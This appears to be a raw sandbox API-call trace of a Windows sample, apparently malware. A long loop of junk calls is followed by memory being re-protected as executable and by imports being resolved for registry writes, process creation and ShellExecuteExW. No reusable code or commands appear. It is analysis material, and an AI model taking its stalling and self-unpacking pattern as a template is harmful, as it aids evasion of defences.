0x0 [0179.623] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.623] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.623] AddAtomA (lpString=0x0) returned 0x0 [0179.623] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.623] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.623] AddAtomA (lpString=0x0) returned 0x0 [0179.623] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.624] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.624] AddAtomA (lpString=0x0) returned 0x0 [0179.624] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.624] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.624] AddAtomA (lpString=0x0) returned 0x0 [0179.624] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.624] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.624] AddAtomA (lpString=0x0) returned 0x0 [0179.624] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.624] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.624] AddAtomA (lpString=0x0) returned 0x0 [0179.624] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.624] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.624] AddAtomA (lpString=0x0) returned 0x0 [0179.624] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.624] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.624] AddAtomA (lpString=0x0) returned 0x0 [0179.624] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.624] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.624] AddAtomA (lpString=0x0) returned 0x0 [0179.624] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.625] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.625] AddAtomA (lpString=0x0) returned 0x0 [0179.625] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.625] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.625] AddAtomA (lpString=0x0) returned 0x0 [0179.625] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.625] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.625] AddAtomA (lpString=0x0) returned 0x0 [0179.625] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.625] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.625] AddAtomA (lpString=0x0) returned 0x0 [0179.625] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.625] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.625] AddAtomA (lpString=0x0) returned 0x0 [0179.625] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.625] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.625] AddAtomA (lpString=0x0) returned 0x0 [0179.625] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.625] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.625] AddAtomA (lpString=0x0) returned 0x0 [0179.625] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.626] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.626] AddAtomA (lpString=0x0) returned 0x0 [0179.626] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.626] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.626] AddAtomA (lpString=0x0) returned 0x0 [0179.626] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.626] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.626] AddAtomA (lpString=0x0) returned 0x0 [0179.626] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.626] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.626] AddAtomA (lpString=0x0) returned 0x0 [0179.626] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.626] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.626] AddAtomA (lpString=0x0) returned 0x0 [0179.626] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.626] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.626] AddAtomA (lpString=0x0) returned 0x0 [0179.626] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.626] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.626] AddAtomA (lpString=0x0) returned 0x0 [0179.626] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.627] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.627] AddAtomA (lpString=0x0) returned 0x0 [0179.627] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.627] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.627] AddAtomA (lpString=0x0) returned 0x0 [0179.627] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.627] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.627] AddAtomA (lpString=0x0) returned 0x0 [0179.627] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.627] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.627] AddAtomA (lpString=0x0) returned 0x0 [0179.627] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.627] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.627] AddAtomA (lpString=0x0) returned 0x0 [0179.627] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.627] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.627] AddAtomA (lpString=0x0) returned 0x0 [0179.627] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.627] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.627] AddAtomA (lpString=0x0) returned 0x0 [0179.628] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.628] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.628] AddAtomA (lpString=0x0) returned 0x0 [0179.628] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.628] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.628] AddAtomA (lpString=0x0) returned 0x0 [0179.628] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.628] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.628] AddAtomA (lpString=0x0) returned 0x0 [0179.628] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.628] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.628] AddAtomA (lpString=0x0) returned 0x0 [0179.628] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.628] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.628] AddAtomA (lpString=0x0) returned 0x0 [0179.628] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.628] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.628] AddAtomA (lpString=0x0) returned 0x0 [0179.628] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.628] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.628] AddAtomA (lpString=0x0) returned 0x0 [0179.628] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.629] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.629] AddAtomA (lpString=0x0) returned 0x0 [0179.629] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.629] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.629] AddAtomA (lpString=0x0) returned 0x0 [0179.629] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.629] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.629] AddAtomA (lpString=0x0) returned 0x0 [0179.629] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.629] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.629] AddAtomA (lpString=0x0) returned 0x0 [0179.629] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.629] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.629] AddAtomA (lpString=0x0) returned 0x0 [0179.629] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.629] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.629] AddAtomA (lpString=0x0) returned 0x0 [0179.629] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.629] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.629] AddAtomA (lpString=0x0) returned 0x0 [0179.629] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.629] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.630] AddAtomA (lpString=0x0) returned 0x0 [0179.630] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.630] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.630] AddAtomA (lpString=0x0) returned 0x0 [0179.630] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.630] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.630] AddAtomA (lpString=0x0) returned 0x0 [0179.630] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.630] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.630] AddAtomA (lpString=0x0) returned 0x0 [0179.630] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.630] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.630] AddAtomA (lpString=0x0) returned 0x0 [0179.630] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.630] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.630] AddAtomA (lpString=0x0) returned 0x0 [0179.630] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.630] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.630] AddAtomA (lpString=0x0) returned 0x0 [0179.630] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.631] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.631] AddAtomA (lpString=0x0) returned 0x0 [0179.631] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.631] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.631] AddAtomA (lpString=0x0) returned 0x0 [0179.631] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.631] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.631] AddAtomA (lpString=0x0) returned 0x0 [0179.631] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.631] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.631] AddAtomA (lpString=0x0) returned 0x0 [0179.631] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.631] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.631] AddAtomA (lpString=0x0) returned 0x0 [0179.631] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.631] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.631] AddAtomA (lpString=0x0) returned 0x0 [0179.631] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.631] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.631] AddAtomA (lpString=0x0) returned 0x0 [0179.631] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.631] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.631] AddAtomA (lpString=0x0) returned 0x0 [0179.632] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.632] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.632] AddAtomA (lpString=0x0) returned 0x0 [0179.632] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.632] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.632] AddAtomA (lpString=0x0) returned 0x0 [0179.632] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.632] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.632] AddAtomA (lpString=0x0) returned 0x0 [0179.632] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.632] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.632] AddAtomA (lpString=0x0) returned 0x0 [0179.632] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.632] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.632] AddAtomA (lpString=0x0) returned 0x0 [0179.632] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.632] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.632] AddAtomA (lpString=0x0) returned 0x0 [0179.632] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.632] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.632] AddAtomA (lpString=0x0) returned 0x0 [0179.632] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.633] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.633] AddAtomA (lpString=0x0) returned 0x0 [0179.633] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.633] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.633] AddAtomA (lpString=0x0) returned 0x0 [0179.633] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.633] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.720] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0179.721] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0179.721] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0179.721] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0179.721] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0179.721] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0179.721] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0179.721] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0179.721] SetErrorMode (uMode=0x400) returned 0x0 [0179.721] SetErrorMode (uMode=0x0) returned 0x400 [0179.722] GetVersionExA (in: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0179.722] VirtualAlloc (lpAddress=0x0, dwSize=0x2d200, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0179.725] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5d8 | out: lpflOldProtect=0x18f5d8*=0x2) returned 1 [0180.286] VirtualFree (lpAddress=0x220000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.287] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0180.287] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0180.288] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0180.288] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0180.288] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0180.288] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0180.288] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0180.288] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0180.288] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0180.288] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0180.288] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0180.288] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0180.288] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0180.288] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0180.288] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0180.289] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0180.289] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0180.289] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0180.289] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0180.289] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0180.289] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0180.289] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0180.289] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0180.289] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0180.289] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0180.289] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0180.289] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0180.289] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0180.290] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0180.290] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0180.290] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0180.290] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0180.290] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0180.290] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0180.290] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0180.290] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0180.290] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0180.290] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0180.290] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0180.290] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0180.290] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0180.290] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0180.291] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0180.291] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0180.291] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0180.291] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0180.291] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0180.291] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSListHead") returned 0x77c794a4 [0180.291] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0180.292] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0180.292] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0180.292] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0180.292] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0180.292] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0180.292] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0180.292] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0180.292] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0180.292] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0180.293] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0180.293] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0180.293] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0180.293] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0180.293] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0180.293] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0180.293] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0180.294] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0180.294] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0180.294] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0180.294] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0180.294] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0180.294] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0180.294] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0180.294] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0180.295] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0180.295] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileExW") returned 0x76d51811 [0180.295] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0180.296] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0180.296] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0180.296] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0180.296] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0180.296] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyExW") returned 0x777240fe [0180.296] GetProcAddress (hModule=0x77710000, lpProcName="SetSecurityDescriptorDacl") returned 0x7772415e [0180.297] GetProcAddress (hModule=0x77710000, lpProcName="InitializeSecurityDescriptor") returned 0x77724620 [0180.297] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0180.297] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0180.297] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0180.297] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0180.297] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0180.297] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0180.297] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0180.298] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0180.298] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0180.298] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0180.305] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0180.306] atexit (param_1=0x5d63d8) returned 0 [0180.306] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5dc | out: lpSystemTimeAsFileTime=0x18f5dc*(dwLowDateTime=0x9ef31640, dwHighDateTime=0x1d60e72)) [0180.306] GetCurrentThreadId () returned 0xa64 [0180.306] 